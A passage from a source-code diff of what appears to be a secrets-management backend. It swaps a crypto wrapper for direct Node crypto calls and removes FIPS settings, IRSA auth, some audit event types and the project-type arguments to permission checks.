       orgId: actorOrgId,
       url,
@@ -155,9 +152,7 @@ export const auditLogStreamServiceFactory = ({
         throw new Error(`Failed to connect with the source ${(err as Error)?.message}`);
       });
 
-    const encryptedHeaders = headers
-      ? crypto.encryption().symmetric().encryptWithRootEncryptionKey(JSON.stringify(headers))
-      : undefined;
+    const encryptedHeaders = headers ? infisicalSymmetricEncypt(JSON.stringify(headers)) : undefined;
     const updatedLogStream = await auditLogStreamDAL.updateById(id, {
       url,
       ...(encryptedHeaders
@@ -210,15 +205,12 @@ export const auditLogStreamServiceFactory = ({
     const headers =
       logStream?.encryptedHeadersCiphertext && logStream?.encryptedHeadersIV && logStream?.encryptedHeadersTag
         ? (JSON.parse(
-            crypto
-              .encryption()
-              .symmetric()
-              .decryptWithRootEncryptionKey({
-                tag: logStream.encryptedHeadersTag,
-                iv: logStream.encryptedHeadersIV,
-                ciphertext: logStream.encryptedHeadersCiphertext,
-                keyEncoding: logStream.encryptedHeadersKeyEncoding as SecretKeyEncoding
-              })
+            infisicalSymmetricDecrypt({
+              tag: logStream.encryptedHeadersTag,
+              iv: logStream.encryptedHeadersIV,
+              ciphertext: logStream.encryptedHeadersCiphertext,
+              keyEncoding: logStream.encryptedHeadersKeyEncoding as SecretKeyEncoding
+            })
           ) as LogStreamHeaders[])
         : undefined;
 

backend/src/ee/services/audit-log/audit-log-queue.ts

@@ -3,7 +3,7 @@ import { AxiosError, RawAxiosRequestHeaders } from "axios";
 import { SecretKeyEncoding } from "@app/db/schemas";
 import { getConfig } from "@app/lib/config/env";
 import { request } from "@app/lib/config/request";
-import { crypto } from "@app/lib/crypto/cryptography";
+import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
 import { logger } from "@app/lib/logger";
 import { QueueJobs, QueueName, TQueueServiceFactory } from "@app/queue";
 import { TProjectDALFactory } from "@app/services/project/project-dal";
@@ -114,15 +114,12 @@ export const auditLogQueueServiceFactory = async ({
               const streamHeaders =
                 encryptedHeadersIV && encryptedHeadersCiphertext && encryptedHeadersTag
                   ? (JSON.parse(
-                      crypto
-                        .encryption()
-                        .symmetric()
-                        .decryptWithRootEncryptionKey({
-                          keyEncoding: encryptedHeadersKeyEncoding as SecretKeyEncoding,
-                          iv: encryptedHeadersIV,
-                          tag: encryptedHeadersTag,
-                          ciphertext: encryptedHeadersCiphertext
-                        })
+                      infisicalSymmetricDecrypt({
+                        keyEncoding: encryptedHeadersKeyEncoding as SecretKeyEncoding,
+                        iv: encryptedHeadersIV,
+                        tag: encryptedHeadersTag,
+                        ciphertext: encryptedHeadersCiphertext
+                      })
                     ) as LogStreamHeaders[])
                   : [];
 
@@ -219,15 +216,12 @@ export const auditLogQueueServiceFactory = async ({
           const streamHeaders =
             encryptedHeadersIV && encryptedHeadersCiphertext && encryptedHeadersTag
               ? (JSON.parse(
-                  crypto
-                    .encryption()
-                    .symmetric()
-                    .decryptWithRootEncryptionKey({
-                      keyEncoding: encryptedHeadersKeyEncoding as SecretKeyEncoding,
-                      iv: encryptedHeadersIV,
-                      tag: encryptedHeadersTag,
-                      ciphertext: encryptedHeadersCiphertext
-                    })
+                  infisicalSymmetricDecrypt({
+                    keyEncoding: encryptedHeadersKeyEncoding as SecretKeyEncoding,
+                    iv: encryptedHeadersIV,
+                    tag: encryptedHeadersTag,
+                    ciphertext: encryptedHeadersCiphertext
+                  })
                 ) as LogStreamHeaders[])
               : [];
 

backend/src/ee/services/audit-log/audit-log-service.ts

@@ -1,7 +1,6 @@
 import { ForbiddenError } from "@casl/ability";
 import { requestContext } from "@fastify/request-context";
 
-import { ActionProjectType } from "@app/db/schemas";
 import { getConfig } from "@app/lib/config/env";
 import { BadRequestError } from "@app/lib/errors";
 import { ActorType } from "@app/services/auth/auth-type";
@@ -38,8 +37,7 @@ export const auditLogServiceFactory = ({
         actorId,
         projectId: filter.projectId,
         actorAuthMethod,
-        actorOrgId,
-        actionProjectType: ActionProjectType.Any
+        actorOrgId
       });
       ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Read, ProjectPermissionSub.AuditLogs);
     } else {

backend/src/ee/services/audit-log/audit-log-types.ts

@@ -449,7 +449,6 @@ export enum EventType {
   PIT_REVERT_COMMIT = "pit-revert-commit",
   PIT_GET_FOLDER_STATE = "pit-get-folder-state",
   PIT_COMPARE_FOLDER_STATES = "pit-compare-folder-states",
-  PIT_PROCESS_NEW_COMMIT_RAW = "pit-process-new-commit-raw",
   SECRET_SCANNING_DATA_SOURCE_LIST = "secret-scanning-data-source-list",
   SECRET_SCANNING_DATA_SOURCE_CREATE = "secret-scanning-data-source-create",
   SECRET_SCANNING_DATA_SOURCE_UPDATE = "secret-scanning-data-source-update",
@@ -468,11 +467,7 @@ export enum EventType {
 
   CREATE_PROJECT = "create-project",
   UPDATE_PROJECT = "update-project",
-  DELETE_PROJECT = "delete-project",
-
-  CREATE_SECRET_REMINDER = "create-secret-reminder",
-  GET_SECRET_REMINDER = "get-secret-reminder",
-  DELETE_SECRET_REMINDER = "delete-secret-reminder"
+  DELETE_PROJECT = "delete-project"
 }
 
 export const filterableSecretEvents: EventType[] = [
@@ -1551,9 +1546,8 @@ interface UpdateFolderEvent {
   metadata: {
     environment: string;
     folderId: string;
-    oldFolderName?: string;
+    oldFolderName: string;
     newFolderName: string;
-    newFolderDescription?: string;
     folderPath: string;
   };
 }
@@ -1717,7 +1711,7 @@ interface SecretApprovalReopened {
 interface SecretApprovalRequest {
   type: EventType.SECRET_APPROVAL_REQUEST;
   metadata: {
-    committedBy?: string | null;
+    committedBy: string;
     secretApprovalRequestSlug: string;
     secretApprovalRequestId: string;
     eventType: SecretApprovalEvent;
@@ -3228,18 +3222,6 @@ interface PitCompareFolderStatesEvent {
   };
 }
 
-interface PitProcessNewCommitRawEvent {
-  type: EventType.PIT_PROCESS_NEW_COMMIT_RAW;
-  metadata: {
-    projectId: string;
-    environment: string;
-    secretPath: string;
-    message: string;
-    approvalId?: string;
-    commitId?: string;
-  };
-}
-
 interface SecretScanningDataSourceListEvent {
   type: EventType.SECRET_SCANNING_DATA_SOURCE_LIST;
   metadata: {
@@ -3330,31 +3312,6 @@ interface SecretScanningConfigUpdateEvent {
   };
 }
 
-interface SecretReminderCreateEvent {
-  type: EventType.CREATE_SECRET_REMINDER;
-  metadata: {
-    secretId: string;
-    message?: string | null;
-    repeatDays?: number | null;
-    nextReminderDate?: string | null;
-    recipients?: string[] | null;
-  };
-}
-
-interface SecretReminderGetEvent {
-  type: EventType.GET_SECRET_REMINDER;
-  metadata: {
-    secretId: string;
-  };
-}
-
-interface SecretReminderDeleteEvent {
-  type: EventType.DELETE_SECRET_REMINDER;
-  metadata: {
-    secretId: string;
-  };
-}
-
 interface SecretScanningConfigReadEvent {
   type: EventType.SECRET_SCANNING_CONFIG_GET;
   metadata?: Record<string, never>; // not needed, based off projectId
@@ -3701,7 +3658,6 @@ export type Event =
   | PitRevertCommitEvent
   | PitCompareFolderStatesEvent
   | PitGetFolderStateEvent
-  | PitProcessNewCommitRawEvent
   | SecretScanningDataSourceListEvent
   | SecretScanningDataSourceGetEvent
   | SecretScanningDataSourceCreateEvent
@@ -3718,7 +3674,4 @@ export type Event =
   | OrgUpdateEvent
   | ProjectCreateEvent
   | ProjectUpdateEvent
-  | ProjectDeleteEvent
-  | SecretReminderCreateEvent
-  | SecretReminderGetEvent
-  | SecretReminderDeleteEvent;
+  | ProjectDeleteEvent;

backend/src/ee/services/certificate-authority-crl/certificate-authority-crl-service.ts

@@ -1,7 +1,6 @@
 import { ForbiddenError } from "@casl/ability";
 import * as x509 from "@peculiar/x509";
 
-import { ActionProjectType } from "@app/db/schemas";
 import { TCertificateAuthorityCrlDALFactory } from "@app/ee/services/certificate-authority-crl/certificate-authority-crl-dal";
 import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types";
 import { ProjectPermissionActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission";
@@ -78,8 +77,7 @@ export const certificateAuthorityCrlServiceFactory = ({
       actorId,
       projectId: ca.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.CertificateManager
+      actorOrgId
     });
 
     ForbiddenError.from(permission).throwUnlessCan(

backend/src/ee/services/dynamic-secret-lease/dynamic-secret-lease-service.ts

@@ -1,7 +1,6 @@
 import { ForbiddenError, subject } from "@casl/ability";
 import RE2 from "re2";
 
-import { ActionProjectType } from "@app/db/schemas";
 import { TLicenseServiceFactory } from "@app/ee/services/license/license-service";
 import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types";
 import {
@@ -85,8 +84,7 @@ export const dynamicSecretLeaseServiceFactory = ({
       actorId,
       projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
 
     const plan = await licenseService.getPlan(actorOrgId);
@@ -202,8 +200,7 @@ export const dynamicSecretLeaseServiceFactory = ({
       actorId,
       projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
 
     const { decryptor: secretManagerDecryptor } = await kmsService.createCipherPairWithDataKey({
@@ -300,8 +297,7 @@ export const dynamicSecretLeaseServiceFactory = ({
       actorId,
       projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
 
     const { decryptor: secretManagerDecryptor } = await kmsService.createCipherPairWithDataKey({
@@ -389,8 +385,7 @@ export const dynamicSecretLeaseServiceFactory = ({
       actorId,
       projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
 
     const folder = await folderDAL.findBySecretPath(projectId, environmentSlug, path);
@@ -437,8 +432,7 @@ export const dynamicSecretLeaseServiceFactory = ({
       actorId,
       projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
 
     const folder = await folderDAL.findBySecretPath(projectId, environmentSlug, path);

backend/src/ee/services/dynamic-secret/dynamic-secret-service.ts

@@ -1,13 +1,11 @@
 import { ForbiddenError, subject } from "@casl/ability";
 
-import { ActionProjectType } from "@app/db/schemas";
 import { TLicenseServiceFactory } from "@app/ee/services/license/license-service";
 import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types";
 import {
   ProjectPermissionDynamicSecretActions,
   ProjectPermissionSub
 } from "@app/ee/services/permission/project-permission";
-import { crypto } from "@app/lib/crypto";
 import { BadRequestError, NotFoundError } from "@app/lib/errors";
 import { OrderByDirection } from "@app/lib/types";
 import { TKmsServiceFactory } from "@app/services/kms/kms-service";
@@ -79,8 +77,7 @@ export const dynamicSecretServiceFactory = ({
       actorId,
       projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
 
     ForbiddenError.from(permission).throwUnlessCan(
@@ -95,12 +92,6 @@ export const dynamicSecretServiceFactory = ({
       });
     }
 
-    if (provider.type === DynamicSecretProviders.MongoAtlas && crypto.isFipsModeEnabled()) {
-      throw new BadRequestError({
-        message: "MongoDB Atlas dynamic secret is not supported in FIPS mode of operation"
-      });
-    }
-
     const folder = await folderDAL.findBySecretPath(projectId, environmentSlug, path);
     if (!folder) {
       throw new NotFoundError({ message: `Folder with path '${path}' in environment '${environmentSlug}' not found` });
@@ -209,8 +200,7 @@ export const dynamicSecretServiceFactory = ({
       actorId,
       projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
 
     const plan = await licenseService.getPlan(actorOrgId);
@@ -361,8 +351,7 @@ export const dynamicSecretServiceFactory = ({
       actorId,
       projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
 
     const folder = await folderDAL.findBySecretPath(projectId, environmentSlug, path);
@@ -427,8 +416,7 @@ export const dynamicSecretServiceFactory = ({
       actorId,
       projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
 
     const folder = await folderDAL.findBySecretPath(projectId, environmentSlug, path);
@@ -492,8 +480,7 @@ export const dynamicSecretServiceFactory = ({
         actorId,
         projectId,
         actorAuthMethod,
-        actorOrgId,
-        actionProjectType: ActionProjectType.SecretManager
+        actorOrgId
       });
 
       // verify user has access to each env in request
@@ -536,8 +523,7 @@ export const dynamicSecretServiceFactory = ({
       actorId,
       projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
     ForbiddenError.from(permission).throwUnlessCan(
       ProjectPermissionDynamicSecretActions.ReadRootCredential,
@@ -585,8 +571,7 @@ export const dynamicSecretServiceFactory = ({
       actorId,
       projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
 
     const folder = await folderDAL.findBySecretPath(projectId, environmentSlug, path);
@@ -623,8 +608,7 @@ export const dynamicSecretServiceFactory = ({
       actorId: actor.id,
       projectId,
       actorAuthMethod: actor.authMethod,
-      actorOrgId: actor.orgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId: actor.orgId
     });
 
     const userAccessibleFolderMappings = folderMappings.filter(({ path, environment }) =>
@@ -668,8 +652,7 @@ export const dynamicSecretServiceFactory = ({
       actorId,
       projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
 
     const folders = await folderDAL.findBySecretPathMultiEnv(projectId, environmentSlugs, path);

backend/src/ee/services/dynamic-secret/providers/aws-elasticache.ts

@@ -12,8 +12,6 @@ import handlebars from "handlebars";
 import { customAlphabet } from "nanoid";
 import { z } from "zod";
 
-import { CustomAWSHasher } from "@app/lib/aws/hashing";
-import { crypto } from "@app/lib/crypto";
 import { BadRequestError } from "@app/lib/errors";
 import { validateHandlebarTemplate } from "@app/lib/template/validate-handlebars";
 
@@ -41,11 +39,8 @@ type TDeleteElastiCacheUserInput = z.infer<typeof DeleteElasticCacheUserSchema>;
 const ElastiCacheUserManager = (credentials: TBasicAWSCredentials, region: string) => {
   const elastiCache = new ElastiCache({
     region,
-    useFipsEndpoint: crypto.isFipsModeEnabled(),
-    sha256: CustomAWSHasher,
     credentials
   });
-
   const infisicalGroup = "infisical-managed-group-elasticache";
 
   const ensureInfisicalGroupExists = async (clusterName: string) => {

backend/src/ee/services/dynamic-secret/providers/aws-iam.ts

@@ -17,12 +17,11 @@ import {
   RemoveUserFromGroupCommand
 } from "@aws-sdk/client-iam";
 import { AssumeRoleCommand, STSClient } from "@aws-sdk/client-sts";
+import { randomUUID } from "crypto";
 import { z } from "zod";
 
-import { CustomAWSHasher } from "@app/lib/aws/hashing";
 import { getConfig } from "@app/lib/config/env";
-import { crypto } from "@app/lib/crypto/cryptography";
-import { BadRequestError, UnauthorizedError } from "@app/lib/errors";
+import { BadRequestError } from "@app/lib/errors";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
 
 import { AwsIamAuthType, DynamicSecretAwsIamSchema, TDynamicProviderFns } from "./models";
@@ -50,8 +49,6 @@ export const AwsIamProvider = (): TDynamicProviderFns => {
     if (providerInputs.method === AwsIamAuthType.AssumeRole) {
       const stsClient = new STSClient({
         region: providerInputs.region,
-        useFipsEndpoint: crypto.isFipsModeEnabled(),
-        sha256: CustomAWSHasher,
         credentials:
           appCfg.DYNAMIC_SECRET_AWS_ACCESS_KEY_ID && appCfg.DYNAMIC_SECRET_AWS_SECRET_ACCESS_KEY
             ? {
@@ -63,7 +60,7 @@ export const AwsIamProvider = (): TDynamicProviderFns => {
 
       const command = new AssumeRoleCommand({
         RoleArn: providerInputs.roleArn,
-        RoleSessionName: `infisical-dynamic-secret-${crypto.nativeCrypto.randomUUID()}`,
+        RoleSessionName: `infisical-dynamic-secret-${randomUUID()}`,
         DurationSeconds: 900, // 15 mins
         ExternalId: projectId
       });
@@ -75,8 +72,6 @@ export const AwsIamProvider = (): TDynamicProviderFns => {
       }
       const client = new IAMClient({
         region: providerInputs.region,
-        useFipsEndpoint: crypto.isFipsModeEnabled(),
-        sha256: CustomAWSHasher,
         credentials: {
           accessKeyId: assumeRes.Credentials?.AccessKeyId,
           secretAccessKey: assumeRes.Credentials?.SecretAccessKey,
@@ -86,27 +81,8 @@ export const AwsIamProvider = (): TDynamicProviderFns => {
       return client;
     }
 
-    if (providerInputs.method === AwsIamAuthType.IRSA) {
-      // Allow instances to disable automatic service account token fetching (e.g. for shared cloud)
-      if (!appCfg.KUBERNETES_AUTO_FETCH_SERVICE_ACCOUNT_TOKEN) {
-        throw new UnauthorizedError({
-          message: "Failed to get AWS credentials via IRSA: KUBERNETES_AUTO_FETCH_SERVICE_ACCOUNT_TOKEN is not enabled."
-        });
-      }
-
-      // The SDK will automatically pick up credentials from the environment
-      const client = new IAMClient({
-        region: providerInputs.region,
-        useFipsEndpoint: crypto.isFipsModeEnabled(),
-        sha256: CustomAWSHasher
-      });
-      return client;
-    }
-
     const client = new IAMClient({
       region: providerInputs.region,
-      useFipsEndpoint: crypto.isFipsModeEnabled(),
-      sha256: CustomAWSHasher,
       credentials: {
         accessKeyId: providerInputs.accessKey,
         secretAccessKey: providerInputs.secretAccessKey
@@ -125,7 +101,7 @@ export const AwsIamProvider = (): TDynamicProviderFns => {
       .catch((err) => {
         const message = (err as Error)?.message;
         if (
-          (providerInputs.method === AwsIamAuthType.AssumeRole || providerInputs.method === AwsIamAuthType.IRSA) &&
+          providerInputs.method === AwsIamAuthType.AssumeRole &&
           // assume role will throw an error asking to provider username, but if so this has access in aws correctly
           message.includes("Must specify userName when calling with non-User credentials")
         ) {

backend/src/ee/services/dynamic-secret/providers/github.ts

@@ -1,7 +1,6 @@
 import axios from "axios";
 import jwt from "jsonwebtoken";
 
-import { crypto } from "@app/lib/crypto";
 import { BadRequestError, InternalServerError } from "@app/lib/errors";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
 import { IntegrationUrls } from "@app/services/integration-auth/integration-list";
@@ -41,7 +40,7 @@ export const GithubProvider = (): TDynamicProviderFns => {
 
     let appJwt: string;
     try {
-      appJwt = crypto.jwt().sign(jwtPayload, privateKey, { algorithm: "RS256" });
+      appJwt = jwt.sign(jwtPayload, privateKey, { algorithm: "RS256" });
     } catch (error) {
       let message = "Failed to sign JWT.";
       if (error instanceof jwt.JsonWebTokenError) {

backend/src/ee/services/dynamic-secret/providers/models.ts

@@ -28,8 +28,7 @@ export enum SqlProviders {
 
 export enum AwsIamAuthType {
   AssumeRole = "assume-role",
-  AccessKey = "access-key",
-  IRSA = "irsa"
+  AccessKey = "access-key"
 }
 
 export enum ElasticSearchAuthTypes {
@@ -222,16 +221,6 @@ export const DynamicSecretAwsIamSchema = z.preprocess(
       userGroups: z.string().trim().optional(),
       policyArns: z.string().trim().optional(),
       tags: ResourceMetadataSchema.optional()
-    }),
-    z.object({
-      method: z.literal(AwsIamAuthType.IRSA),
-      region: z.string().trim().min(1),
-      awsPath: z.string().trim().optional(),
-      permissionBoundaryPolicyArn: z.string().trim().optional(),
-      policyDocument: z.string().trim().optional(),
-      userGroups: z.string().trim().optional(),
-      policyArns: z.string().trim().optional(),
-      tags: ResourceMetadataSchema.optional()
     })
   ])
 );

backend/src/ee/services/dynamic-secret/providers/sql-database.ts

@@ -1,8 +1,8 @@
+import { randomInt } from "crypto";
 import handlebars from "handlebars";
 import knex from "knex";
 import { z } from "zod";
 
-import { crypto } from "@app/lib/crypto/cryptography";
 import { GatewayProxyProtocol, withGatewayProxy } from "@app/lib/gateway";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
 import { validateHandlebarTemplate } from "@app/lib/template/validate-handlebars";
@@ -50,7 +50,7 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
       parts.push(
         ...Array(required.lowercase)
           .fill(0)
-          .map(() => chars.lowercase[crypto.randomInt(chars.lowercase.length)])
+          .map(() => chars.lowercase[randomInt(chars.lowercase.length)])
       );
     }
 
@@ -58,7 +58,7 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
       parts.push(
         ...Array(required.uppercase)
           .fill(0)
-          .map(() => chars.uppercase[crypto.randomInt(chars.uppercase.length)])
+          .map(() => chars.uppercase[randomInt(chars.uppercase.length)])
       );
     }
 
@@ -66,7 +66,7 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
       parts.push(
         ...Array(required.digits)
           .fill(0)
-          .map(() => chars.digits[crypto.randomInt(chars.digits.length)])
+          .map(() => chars.digits[randomInt(chars.digits.length)])
       );
     }
 
@@ -74,7 +74,7 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
       parts.push(
         ...Array(required.symbols)
           .fill(0)
-          .map(() => chars.symbols[crypto.randomInt(chars.symbols.length)])
+          .map(() => chars.symbols[randomInt(chars.symbols.length)])
       );
     }
 
@@ -89,12 +89,12 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
     parts.push(
       ...Array(remainingLength)
         .fill(0)
-        .map(() => allowedChars[crypto.randomInt(allowedChars.length)])
+        .map(() => allowedChars[randomInt(allowedChars.length)])
     );
 
     // shuffle the array to mix up the characters
     for (let i = parts.length - 1; i > 0; i -= 1) {
-      const j = crypto.randomInt(i + 1);
+      const j = randomInt(i + 1);
       [parts[i], parts[j]] = [parts[j], parts[i]];
     }
 

backend/src/ee/services/dynamic-secret/providers/vertica.ts

@@ -1,8 +1,8 @@
+import { randomInt } from "crypto";
 import handlebars from "handlebars";
 import knex, { Knex } from "knex";
 import { z } from "zod";
 
-import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError } from "@app/lib/errors";
 import { GatewayProxyProtocol, withGatewayProxy } from "@app/lib/gateway";
 import { logger } from "@app/lib/logger";
@@ -64,7 +64,7 @@ const generatePassword = (requirements?: PasswordRequirements) => {
       parts.push(
         ...Array(required.lowercase)
           .fill(0)
-          .map(() => chars.lowercase[crypto.randomInt(chars.lowercase.length)])
+          .map(() => chars.lowercase[randomInt(chars.lowercase.length)])
       );
     }
 
@@ -72,7 +72,7 @@ const generatePassword = (requirements?: PasswordRequirements) => {
       parts.push(
         ...Array(required.uppercase)
           .fill(0)
-          .map(() => chars.uppercase[crypto.randomInt(chars.uppercase.length)])
+          .map(() => chars.uppercase[randomInt(chars.uppercase.length)])
       );
     }
 
@@ -80,7 +80,7 @@ const generatePassword = (requirements?: PasswordRequirements) => {
       parts.push(
         ...Array(required.digits)
           .fill(0)
-          .map(() => chars.digits[crypto.randomInt(chars.digits.length)])
+          .map(() => chars.digits[randomInt(chars.digits.length)])
       );
     }
 
@@ -88,7 +88,7 @@ const generatePassword = (requirements?: PasswordRequirements) => {
       parts.push(
         ...Array(required.symbols)
           .fill(0)
-          .map(() => chars.symbols[crypto.randomInt(chars.symbols.length)])
+          .map(() => chars.symbols[randomInt(chars.symbols.length)])
       );
     }
 
@@ -103,12 +103,12 @@ const generatePassword = (requirements?: PasswordRequirements) => {
     parts.push(
       ...Array(remainingLength)
         .fill(0)
-        .map(() => allowedChars[crypto.randomInt(allowedChars.length)])
+        .map(() => allowedChars[randomInt(allowedChars.length)])
     );
 
     // shuffle the array to mix up the characters
     for (let i = parts.length - 1; i > 0; i -= 1) {
-      const j = crypto.randomInt(i + 1);
+      const j = randomInt(i + 1);
       [parts[i], parts[j]] = [parts[j], parts[i]];
     }
 

backend/src/ee/services/external-kms/providers/aws-kms.ts

@@ -1,8 +1,6 @@
 import { CreateKeyCommand, DecryptCommand, DescribeKeyCommand, EncryptCommand, KMSClient } from "@aws-sdk/client-kms";
 import { AssumeRoleCommand, STSClient } from "@aws-sdk/client-sts";
-
-import { CustomAWSHasher } from "@app/lib/aws/hashing";
-import { crypto } from "@app/lib/crypto/cryptography";
+import { randomUUID } from "crypto";
 
 import { ExternalKmsAwsSchema, KmsAwsCredentialType, TExternalKmsAwsSchema, TExternalKmsProviderFns } from "./model";
 
@@ -10,13 +8,11 @@ const getAwsKmsClient = async (providerInputs: TExternalKmsAwsSchema) => {
   if (providerInputs.credential.type === KmsAwsCredentialType.AssumeRole) {
     const awsCredential = providerInputs.credential.data;
     const stsClient = new STSClient({
-      region: providerInputs.awsRegion,
-      useFipsEndpoint: crypto.isFipsModeEnabled(),
-      sha256: CustomAWSHasher
+      region: providerInputs.awsRegion
     });
     const command = new AssumeRoleCommand({
       RoleArn: awsCredential.assumeRoleArn,
-      RoleSessionName: `infisical-kms-${crypto.nativeCrypto.randomUUID()}`,
+      RoleSessionName: `infisical-kms-${randomUUID()}`,
       DurationSeconds: 900, // 15mins
       ExternalId: awsCredential.externalId
     });
@@ -26,8 +22,6 @@ const getAwsKmsClient = async (providerInputs: TExternalKmsAwsSchema) => {
 
     const kmsClient = new KMSClient({
       region: providerInputs.awsRegion,
-      useFipsEndpoint: crypto.isFipsModeEnabled(),
-      sha256: CustomAWSHasher,
       credentials: {
         accessKeyId: response.Credentials.AccessKeyId,
         secretAccessKey: response.Credentials.SecretAccessKey,
@@ -40,8 +34,6 @@ const getAwsKmsClient = async (providerInputs: TExternalKmsAwsSchema) => {
   const awsCredential = providerInputs.credential.data;
   const kmsClient = new KMSClient({
     region: providerInputs.awsRegion,
-    useFipsEndpoint: crypto.isFipsModeEnabled(),
-    sha256: CustomAWSHasher,
     credentials: {
       accessKeyId: awsCredential.accessKey,
       secretAccessKey: awsCredential.secretKey

backend/src/ee/services/gateway/gateway-service.ts

@@ -1,10 +1,11 @@
+import crypto from "node:crypto";
+
 import { ForbiddenError } from "@casl/ability";
 import * as x509 from "@peculiar/x509";
 import { z } from "zod";
 
 import { KeyStorePrefixes, PgSqlLock, TKeyStoreFactory } from "@app/keystore/keystore";
 import { getConfig } from "@app/lib/config/env";
-import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, NotFoundError } from "@app/lib/errors";
 import { pingGatewayAndVerify } from "@app/lib/gateway";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
@@ -148,9 +149,9 @@ export const gatewayServiceFactory = ({
 
       const alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_2048);
       // generate root CA
-      const rootCaKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+      const rootCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
       const rootCaSerialNumber = createSerialNumber();
-      const rootCaSkObj = crypto.nativeCrypto.KeyObject.from(rootCaKeys.privateKey);
+      const rootCaSkObj = crypto.KeyObject.from(rootCaKeys.privateKey);
       const rootCaIssuedAt = new Date();
       const rootCaKeyAlgorithm = CertKeyAlgorithm.RSA_2048;
       const rootCaExpiration = new Date(new Date().setFullYear(2045));
@@ -172,8 +173,8 @@ export const gatewayServiceFactory = ({
       const clientCaSerialNumber = createSerialNumber();
       const clientCaIssuedAt = new Date();
       const clientCaExpiration = new Date(new Date().setFullYear(2045));
-      const clientCaKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-      const clientCaSkObj = crypto.nativeCrypto.KeyObject.from(clientCaKeys.privateKey);
+      const clientCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+      const clientCaSkObj = crypto.KeyObject.from(clientCaKeys.privateKey);
 
       const clientCaCert = await x509.X509CertificateGenerator.create({
         serialNumber: clientCaSerialNumber,
@@ -199,7 +200,7 @@ export const gatewayServiceFactory = ({
         ]
       });
 
-      const clientKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+      const clientKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
       const clientCertSerialNumber = createSerialNumber();
       const clientCert = await x509.X509CertificateGenerator.create({
         serialNumber: clientCertSerialNumber,
@@ -225,14 +226,14 @@ export const gatewayServiceFactory = ({
           new x509.ExtendedKeyUsageExtension([x509.ExtendedKeyUsage[CertExtendedKeyUsage.CLIENT_AUTH]], true)
         ]
       });
-      const clientSkObj = crypto.nativeCrypto.KeyObject.from(clientKeys.privateKey);
+      const clientSkObj = crypto.KeyObject.from(clientKeys.privateKey);
 
       // generate gateway ca
       const gatewayCaSerialNumber = createSerialNumber();
       const gatewayCaIssuedAt = new Date();
       const gatewayCaExpiration = new Date(new Date().setFullYear(2045));
-      const gatewayCaKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-      const gatewayCaSkObj = crypto.nativeCrypto.KeyObject.from(gatewayCaKeys.privateKey);
+      const gatewayCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+      const gatewayCaSkObj = crypto.KeyObject.from(gatewayCaKeys.privateKey);
       const gatewayCaCert = await x509.X509CertificateGenerator.create({
         serialNumber: gatewayCaSerialNumber,
         subject: `O=${identityOrg},CN=Gateway CA`,
@@ -325,7 +326,7 @@ export const gatewayServiceFactory = ({
     );
 
     const gatewayCaAlg = keyAlgorithmToAlgCfg(orgGatewayConfig.rootCaKeyAlgorithm as CertKeyAlgorithm);
-    const gatewayCaSkObj = crypto.nativeCrypto.createPrivateKey({
+    const gatewayCaSkObj = crypto.createPrivateKey({
       key: orgKmsDecryptor({ cipherTextBlob: orgGatewayConfig.encryptedGatewayCaPrivateKey }),
       format: "der",
       type: "pkcs8"
@@ -336,7 +337,7 @@ export const gatewayServiceFactory = ({
       })
     );
 
-    const gatewayCaPrivateKey = await crypto.nativeCrypto.subtle.importKey(
+    const gatewayCaPrivateKey = await crypto.subtle.importKey(
       "pkcs8",
       gatewayCaSkObj.export({ format: "der", type: "pkcs8" }),
       gatewayCaAlg,
@@ -345,7 +346,7 @@ export const gatewayServiceFactory = ({
     );
 
